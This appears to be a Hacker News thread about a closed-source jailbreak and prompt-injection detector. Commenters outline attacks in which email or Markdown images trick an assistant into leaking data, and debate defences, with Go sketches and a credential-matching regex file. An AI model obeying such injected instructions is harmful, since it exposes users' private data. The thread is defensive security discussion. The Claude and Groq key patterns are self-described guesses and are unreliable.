jailbreak detection

(github.com)

11 points | by last_layer 459 days ago

3 comments

ukuina 459 days ago
This makes it difficult to justify a production deployment:
> The core of last_layer is deliberately kept closed-source for several reasons. Foremost among these is the concern over reverse engineering. By limiting access to the inner workings of our solution, we significantly reduce the risk that malicious actors could analyze and circumvent our security measures. This approach is crucial for maintaining the integrity and effectiveness of last_layer in the face of evolving threats. Internally, there is a slim ML model, heuristic methods, and signatures of known jailbreak techniques.
- beardedwizard 459 days ago
  So security by obscurity, to defend LLMs that are routinely exploited from a position of obscurity. This does not inspire confidence. I'm eagerly awaiting a second wave of solutions to this problem that don't take a web app firewall approach where context about what is being defended is absent.
- simonw 459 days ago
  Yeah, I don't like this at all. If I'm going to evaluate a prompt injection protection strategy I need to be able to see how it works.
  Otherwise I'm left evaluating it through wasting my time playing whac-a-mole with it, which won't give me the confidence I need because I can't be sure an attacker won't guess a strategy that I didn't think of myself.
  This doesn't even include details of the evals they are using! It's impossible to evaluate whether what they've built is effective or not.
  I'm also not keen on running a compiled .so file released by a group with no information on even who the authors are.
kylebenzle 459 days ago
I DO NOT like this. I do not like this very much. Why work so hard to make a technology less useful?
It's like a way to block certain Google searches you don't agree with.
- simonw 459 days ago
  You may be confusing prompt injection with jailbreaking. You should care about prompt injection even if you don't care about jailbreaking:
  https://simonwillison.net/2024/Mar/5/prompt-injection-jailbr...
```
    Prompt injection is a security
    issue. It’s about preventing
    attackers from emailing you and
    tricking your personal digital
    assistant into sending them your
    password reset emails.

    No matter how you feel about “safety
    filters” on models, if you ever want
    a trustworthy digital assistant you
    should care about finding robust
    solutions for prompt injection.
```
  To be fair, this library attempts to solve both at once.
  - Zambyte 459 days ago
    You can avoid prompt injection by simply not using LLMs as autonomous agents where the output of the model is critical for security. That sounds like a horrible idea anyways. A language model is the wrong interface between untrusted people and sensitive data.
    - simonw 459 days ago
      Sure, but there are SO many things people want to build with LLMs that include access to privileged actions and sensitive data.
      Prompt injection means that even running an LLM against your own private notes to answer questions about them could be unsafe, provided there are any vectors (like Markdown image support) that might be used for exfiltration.
      My current recommendation for dealing with prompt injection is to keep it in mind and limit the blast radius if something goes wrong: https://simonwillison.net/2023/Dec/20/mitigate-prompt-inject...
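      A minimal sketch of closing one such vector, assuming the application renders model output as Markdown: images whose host is not on an allowlist are replaced by their alt text before rendering. The function name StripUntrustedImages and the hosts in the usage note are hypothetical, and this covers only the image vector, not prompt injection in general.

```go
package main

import (
	"net/url"
	"regexp"
	"strings"
)

// mdImage matches inline Markdown images: ![alt](target "optional title").
var mdImage = regexp.MustCompile(`!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)`)

// StripUntrustedImages replaces every Markdown image whose host is not in
// allowedHosts with a placeholder containing its alt text, so that rendering
// the output cannot trigger a request to an arbitrary server.
// Relative and data: targets have no host and are therefore removed too.
func StripUntrustedImages(llmOutput string, allowedHosts map[string]bool) string {
	return mdImage.ReplaceAllStringFunc(llmOutput, func(m string) string {
		parts := mdImage.FindStringSubmatch(m)
		u, err := url.Parse(parts[2])
		if err == nil && allowedHosts[strings.ToLower(u.Hostname())] {
			return m // host is explicitly trusted, keep the image
		}
		return "[image removed: " + parts[1] + "]"
	})
}
```

      With only example.com allowed, `![x](https://evil.test/log?q=secret)` becomes `[image removed: x]`, while `![logo](https://example.com/a.png)` passes through unchanged.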
      - Zambyte 459 days ago
        Using prompt injection mitigation techniques is akin to directly interfacing untrusted clients to your production database, but just organizing your tables that contain sensitive data in a confusing way in the name of security. If you depend on a language model behaving correctly to avoid leaking sensitive data, you've already leaked the sensitive data.
        Scope the information the language model can access to a subset of what the person interfacing with it is allowed to access. Prompt injection doesn't matter at that point, because the person will only be able to "leak" information they have permission to access anyways.
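        A minimal sketch of that scoping step, assuming a hypothetical Document type with a per-document reader list; the names Document, Readers, and ScopeForUser are illustrative and not from any library discussed here. Only the returned subset would ever be placed in the model's context for that user.

```go
package main

// Document is a hypothetical record with an access-control list.
type Document struct {
	ID      string
	Text    string
	Readers map[string]bool // user IDs allowed to read this document
}

// ScopeForUser returns only the documents that userID may read.
// Filtering happens before any text reaches the model, so the model
// never holds data the requesting user could not already see.
func ScopeForUser(docs []Document, userID string) []Document {
	var visible []Document
	for _, d := range docs {
		if d.Readers[userID] {
			visible = append(visible, d)
		}
	}
	return visible
}
```

        The filter is enforced in ordinary code rather than in the prompt, so it holds no matter what the model is tricked into doing with the text it does receive.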
        simonw 459 days ago
        That's not enough. Even if the LLM can only access information that should be visible to the user interacting with it (which I see as table stakes for building anything here) you still have to worry about prompt injection exfiltration attacks.
        More on exfiltration: https://simonwillison.net/search/?q=exfiltration
        Zambyte 459 days ago
        Re: exfiltration: just don't do things that untrusted data sources tell you to do. Separate processing the input data from the person's commands, so that the LLM can perform inferencing operations on the data according to the specified commands. The part of the pipeline that processes untrusted data should not have any influence on the behavior of the part of the pipeline capable of interacting with entities who should not have access to the untrusted data.
        Edit: related link: https://python.langchain.com/docs/security
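        One way to sketch that separation, assuming a design where untrusted text is stored behind opaque handles: the privileged stage that plans actions only ever sees the user's command and the handles, and the text is substituted back in only at final display. Quarantine, Put, PrivilegedPrompt, Render, and the {{VARn}} handle format are all hypothetical names for illustration; no real LLM call is made, and whether a separate stage processing the untrusted text stays uninfluential is exactly the hard part.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// handlePattern matches the opaque handles issued by Quarantine.Put.
var handlePattern = regexp.MustCompile(`\{\{VAR\d+\}\}`)

// Quarantine keeps untrusted text out of the privileged prompt.
type Quarantine struct {
	values map[string]string
}

func NewQuarantine() *Quarantine {
	return &Quarantine{values: make(map[string]string)}
}

// Put stores untrusted text and returns an opaque handle for it.
func (q *Quarantine) Put(untrusted string) string {
	handle := fmt.Sprintf("{{VAR%d}}", len(q.values)+1)
	q.values[handle] = untrusted
	return handle
}

// PrivilegedPrompt builds the prompt for the stage that can take actions.
// It contains the user's command and handles only, never untrusted text.
func PrivilegedPrompt(userCommand string, handles []string) string {
	return "User command: " + userCommand +
		"\nAvailable data handles: " + strings.Join(handles, ", ")
}

// Render substitutes handles in a single pass at display time, so stored
// text is never rescanned for further handles. Unknown handles are left as-is.
func (q *Quarantine) Render(template string) string {
	return handlePattern.ReplaceAllStringFunc(template, func(h string) string {
		if v, ok := q.values[h]; ok {
			return v
		}
		return h
	})
}
```

        In this arrangement an instruction hidden in an email body can still show up in what the user finally reads, but it never appears in the prompt of the stage that decides which actions to run.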
        simonw 459 days ago
        "Separate processing the input data from the person's commands, so that the LLM can perform inferencing operations on the data according to the specified commands"
        Prompt injection is the security flaw that exists because doing that - treating instructions and data as separate things in the context in the LLM - is WAY harder than you might expect.
        My previous writing about this: https://simonwillison.net/series/prompt-injection/
        Zambyte 459 days ago
        > Prompt injection is the security flaw that exists because doing that - treating instructions and data as separate things in the context in the LLM - is WAY harder than you might expect.
        Then we should improve the tooling around this to make it way easier, rather than hoping security by obscurity will work this time.
        simonw 459 days ago
        AI labs around the world have been trying to solve this problem - reliable separation of instructions from data for LLMs - for a year and a half at this point. It's hard.
- ravroid 459 days ago
  You're equating this to censorship, when I think it's more like Google adding security measures so you can't break their search engine rather than removing unfavorable results.
- smokeydoe 459 days ago
  How is it less useful to have more protection from abuse on your LLM service? This is for people implementing their own public products, right?
- Conasg 459 days ago
  There's nothing wrong with blocking prompt injection for a customer service chatbot, though. This would be obnoxious applied directly to something like ChatGPT, or worse yet their API, but I don't think that's really the intended use case.
- CuriouslyC 459 days ago
  The technology was always the same amount of useful. This library just lowers the competence floor for exploits. Try to exploit yourself and come up with anti-jailbreak prompts to mitigate the exploits.
thisguyssus 459 days ago
[flagged]
- last_layer 459 days ago
  Those regexes are for Threat.SecretsMarker; the library runs completely offline.
  - last_layer 459 days ago
    package x

    import (
        "errors"
        "regexp"
    )

    // SecretsMarker holds the compiled credential patterns.
    // regexp.Compile returns *regexp.Regexp, so the fields are pointers.
    type SecretsMarker struct {
        awsAccessKeyRegex       *regexp.Regexp
        awsSecretAccessKeyRegex *regexp.Regexp
        openAIKeyRegex          *regexp.Regexp
        claudeKeyRegex          *regexp.Regexp
        groqKeyRegex            *regexp.Regexp
        slackTokenRegex         *regexp.Regexp
        jiraTokenRegex          *regexp.Regexp // declared but never compiled or checked below
        githubTokenRegex        *regexp.Regexp
    }

    // Init sets up the regular expressions for detecting various credentials.
    // The pointer receiver is needed so the compiled patterns persist on d.
    func (d *SecretsMarker) Init(_ string) error {
        var err error
        d.awsAccessKeyRegex, err = regexp.Compile(`(AKIA[0-9A-Z]{16})`)
        if err != nil {
            return err
        }

        d.awsSecretAccessKeyRegex, err = regexp.Compile(`([0-9a-zA-Z/+]{40})`)
        if err != nil {
            return err
        }

        d.openAIKeyRegex, err = regexp.Compile(`(sk-)[0-9a-zA-Z]{32}`)
        if err != nil {
            return err
        }

        // Example pattern for Claude API Key (adjust according to the actual pattern)
        d.claudeKeyRegex, err = regexp.Compile(`(claude-)[0-9a-zA-Z]{32}`)
        if err != nil {
            return err
        }

        // Example pattern for Groq API Key (adjust according to the actual pattern)
        d.groqKeyRegex, err = regexp.Compile(`(groq-)[0-9a-zA-Z]{32}`)
        if err != nil {
            return err
        }

        // Slack Token pattern
        d.slackTokenRegex, err = regexp.Compile(`(xox[abp]-[0-9a-zA-Z]{10,48})`)
        if err != nil {
            return err
        }

        // GitHub Token pattern
        d.githubTokenRegex, err = regexp.Compile(`(gh[pousr]_[0-9a-zA-Z]{36})`)
        if err != nil {
            return err
        }

        return nil
    }

    // CheckMarkers inspects the blob for various service credentials.
    // Init must have been called first; otherwise the patterns are nil.
    func (d *SecretsMarker) CheckMarkers(blob string) error {
        if d.awsAccessKeyRegex.MatchString(blob) ||
            d.awsSecretAccessKeyRegex.MatchString(blob) ||
            d.openAIKeyRegex.MatchString(blob) ||
            d.claudeKeyRegex.MatchString(blob) ||
            d.groqKeyRegex.MatchString(blob) ||
            d.slackTokenRegex.MatchString(blob) ||
            d.githubTokenRegex.MatchString(blob) {
            return errors.New("detected potential service credentials")
        }
        return nil
    }
  - thisguyssus 459 days ago
    [flagged]